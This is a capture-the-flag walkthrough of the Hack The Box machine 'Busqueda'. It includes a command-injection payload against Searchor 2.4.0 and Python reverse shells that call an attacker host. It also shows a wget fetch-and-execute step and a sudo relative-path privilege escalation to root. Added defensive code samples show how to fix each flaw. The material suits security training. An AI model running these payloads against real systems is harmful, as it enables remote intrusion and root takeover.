Busqueda — Hack The Box
In this write-up, we will solve a box on hackthebox called Busqueda.
Nmap Scan
nmap -sC -sV -oA nmap/Busqueda 10.10.11.208
We find an SSH port and an HTTP port open.
Web server enumeration
First, add the hostname to the /etc/hosts file:
echo "10.10.11.208 searcher.htb" >> /etc/hosts
Looking at the technology used by the web page, it runs Searchor 2.4.0.
After some googling we find that this version is vulnerable to remote command injection.
We use a proof of concept from GitHub:
', exec("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ATTACKER_IP',PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);"))#
Fill in ATTACKER_IP and PORT in the payload and fire up an nc listener on that port:
nc -nvlp 1234
Then paste the payload into the search field and submit it.
We get a shell back and can read the user flag.
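The bug class behind the PoC above is user input interpolated into source text that is then passed to eval(). The following is an added illustration, not Searchor's own code: a small search-URL builder that evaluates interpolated input, beside a version that passes the query as an ordinary argument. The engine table, function names and the probe string are constructed for the example.

```python
"""Added illustration of eval-based injection (not Searchor's own code): a
search-URL builder that interpolates user input into a Python expression and
evaluates it, beside a version that never evaluates user input."""
from urllib.parse import quote

# Constructed engine table standing in for a library's search-engine enum.
ENGINES = {
    "Google": "https://www.google.com/search?q={}",
    "Bing": "https://www.bing.com/search?q={}",
}


def build_url(engine: str, query: str) -> str:
    """Build the search URL; the query is percent-encoded, so any quotes,
    commas or parentheses it contains are just data in the URL."""
    return ENGINES[engine].format(quote(query, safe=""))


def vulnerable_search(engine: str, query: str) -> str:
    """BAD: the user-controlled query is pasted into source text that is then
    eval()'d. A query containing a single quote closes the string literal and
    whatever follows runs as Python."""
    return eval(f"build_url('{engine}', '{query}')")


def hardened_search(engine: str, query: str) -> str:
    """GOOD: validate the engine against an allow-list and pass the query as an
    ordinary argument; no source text is built from input, so there is
    nothing to break out of."""
    if engine not in ENGINES:
        raise ValueError(f"unknown engine: {engine!r}")
    return build_url(engine, query)


# A benign breakout probe (constructed): it closes the string literal and
# appends a second call, so the eval'd version returns a Bing URL even though
# the caller asked for Google.
PROBE = "x') and build_url('Bing', 'pwned"


if __name__ == "__main__":
    print(vulnerable_search("Google", PROBE))  # control flow hijacked
    print(hardened_search("Google", PROBE))    # probe is just a query string
```

The hardened version needs no quoting or escaping logic at all: once input is never turned into code, the only remaining question is whether the engine name is on the allow-list.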
Root Privilege escalation
Enumerating the app folder under /var/www,
we find useful information in the git log and config files:
git log
shows a user called administrator and a subdomain, gitea.searcher.htb,
and
git config -l
reveals another user, Cody, together with his password for the Gitea instance at gitea.searcher.htb.
Now let's get that subdomain resolving:
edit the /etc/hosts file and add the subdomain to the entry for the box.
Log in with Cody's credentials on the site.
There is not much in the account, but the password we found for Cody is reused by the svc account, the same account we have a shell as.
If we run
sudo -S -l
we can see that we can run the script system-checkup.py as root:
sudo -S /usr/bin/python3 /opt/scripts/system-checkup.py random
The system-checkup script offers three actions:
1. docker-ps
There are two containers running on the machine:
one running a Gitea server and another running a MySQL server.
2. docker-inspect
To use this we need to supply a format and a container name.
Different formats can be used;
to dump everything, use '{{json .}}'.
Dumping the Gitea container data:
sudo -S /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect '{{json .}}' gitea
Nothing much in the Gitea dump.
Dumping the MySQL container data:
sudo -S /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect '{{json .}}' mysql_db
We get some passwords from this dump.
There is nothing much in the MySQL database itself,
but we can try to log in to Gitea with these credentials as administrator.
3. full-checkup
Running this gives an error.
We can log in to Gitea as administrator with the password we found in the MySQL dump.
There we find the scripts we have been running, but we cannot change their content.
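The MySQL dump above leaks credentials because they were handed to the container as environment variables, and anything that can call docker inspect (here, the sudo-wrapped docker-inspect action, which accepts an arbitrary format string and so is effectively unrestricted) can read them. The following is an added audit check, not part of the write-up or the box's tooling: it parses docker inspect output and reports which containers carry credential-looking variable names. The sample JSON, container names and values are constructed for the example.

```python
"""Added check (not part of the write-up's tooling): scan `docker inspect`
output for credentials passed to containers as environment variables."""
import json
import re

# Constructed sample shaped like `docker inspect` output, trimmed to the
# fields this check reads. The names and values are made up, not the box's.
SAMPLE_INSPECT = json.dumps([
    {
        "Name": "/mysql_db",
        "Config": {
            "Env": [
                "MYSQL_ROOT_PASSWORD=example-root-pw",
                "MYSQL_USER=app",
                "MYSQL_PASSWORD=example-app-pw",
                "PATH=/usr/local/sbin:/usr/local/bin:/usr/bin",
            ]
        },
    },
    {
        "Name": "/gitea",
        "Config": {"Env": ["USER=git", "GITEA__database__PASSWD=example-db-pw"]},
    },
])

# Variable names that usually carry a credential.
SECRET_KEY = re.compile(r"PASS(WORD|WD)?|SECRET|TOKEN|API_?KEY", re.IGNORECASE)


def find_env_secrets(inspect_json: str) -> list:
    """Return (container, variable) pairs whose name looks like a credential.
    Values are deliberately not returned, so the report itself is safe to log."""
    findings = []
    for container in json.loads(inspect_json):
        name = container.get("Name", "").lstrip("/")
        for entry in container.get("Config", {}).get("Env", []) or []:
            key, _, _value = entry.partition("=")
            if SECRET_KEY.search(key):
                findings.append((name, key))
    return findings


if __name__ == "__main__":
    for container, key in find_env_secrets(SAMPLE_INSPECT):
        print(f"{container}: {key} is set as a plain environment variable")
```

Run it against real output with `docker inspect $(docker ps -q)` piped into a file. Every hit is a value that survives in the container's metadata for as long as the container exists; mounting the secret from a file (the official MySQL image accepts `MYSQL_ROOT_PASSWORD_FILE` for this) or using Docker secrets keeps it out of docker inspect.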
If we read the code of system-checkup.py, we can see that full-checkup.sh is referenced without its full path,
so it can only run when the current directory is the one containing full-checkup.sh.
It is located in the /opt/scripts directory.
As expected, it works when we run it from the script directory.
But what if we make our own script and run it?
Create a reverse shell in Python (a bash one will not work):
#!/usr/bin/python3
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.112",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")
Save it as full-checkup.sh
and host it with a Python web server:
python3 -m http.server 1234
Copy the link to the file
and start an nc listener.
Then, from a writable directory such as /tmp, run:
wget http://10.10.14.112:1234/full-checkup.sh;chmod +x full-checkup.sh; sudo -S /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup
and we get our shell as root.
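The root cause is that the script run under sudo resolves its helper relative to the caller's working directory, so whoever is allowed to invoke the sudo rule chooses which file root executes. The following is an added illustration of that flaw and of a pinned, permission-checked replacement; it is not the box's system-checkup.py. It assumes the helper lives next to the calling script, as full-checkup.sh does next to system-checkup.py in /opt/scripts, and the helper it exercises in demo() is constructed in a temporary directory.

```python
"""Added illustration of the relative-path flaw and a hardened replacement.
Not the box's system-checkup.py."""
import os
import stat
import subprocess
import tempfile

# Assumption: the helper lives next to this script, like full-checkup.sh next
# to system-checkup.py in /opt/scripts on the box.
SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
HELPER_NAME = "full-checkup.sh"


def helper_path_relative(cwd: str) -> str:
    """What './full-checkup.sh' resolves to: it follows the caller's cwd, so
    whoever invokes the sudo rule from a directory they control picks the file."""
    return os.path.normpath(os.path.join(cwd, HELPER_NAME))


def helper_path_pinned() -> str:
    """Hardened: anchor the helper to the directory of the script itself,
    independent of the caller's cwd."""
    return os.path.join(SCRIPT_DIR, HELPER_NAME)


def check_helper(path: str, expected_uid: int = 0) -> bool:
    """Before executing anything under sudo, refuse symlinks, files not owned
    by expected_uid (root on the box) and group- or world-writable files."""
    try:
        st = os.lstat(path)
    except FileNotFoundError:
        return False
    if stat.S_ISLNK(st.st_mode) or not stat.S_ISREG(st.st_mode):
        return False
    if st.st_uid != expected_uid:
        return False
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        return False
    return True


def run_helper(path: str, expected_uid: int = 0) -> str:
    """Run the helper only if it passes the ownership and permission checks."""
    if not check_helper(path, expected_uid):
        raise PermissionError(f"refusing to execute untrusted helper: {path}")
    out = subprocess.run(["/bin/sh", path], capture_output=True, text=True, check=True)
    return out.stdout.strip()


def demo() -> dict:
    """Exercise the checks against a constructed helper in a temp directory."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, HELPER_NAME)
        with open(path, "w") as f:
            f.write("#!/bin/sh\necho checkup-ok\n")
        os.chmod(path, 0o755)
        me = os.getuid()
        results = {
            "relative_from_tmp": helper_path_relative("/tmp"),
            "owned_and_locked": check_helper(path, me),
            "wrong_owner": check_helper(path, me + 1),
            "output": run_helper(path, me),
        }
        os.chmod(path, 0o777)  # world-writable: must now be refused
        results["world_writable"] = check_helper(path, me)
    return results


if __name__ == "__main__":
    print(demo())
```

The sudo rule is the other half of the fix: a rule that lets a low-privilege user run a wrapper with arbitrary arguments is only as safe as every code path those arguments can reach, so the wrapper must never derive what it executes from the caller's environment or working directory.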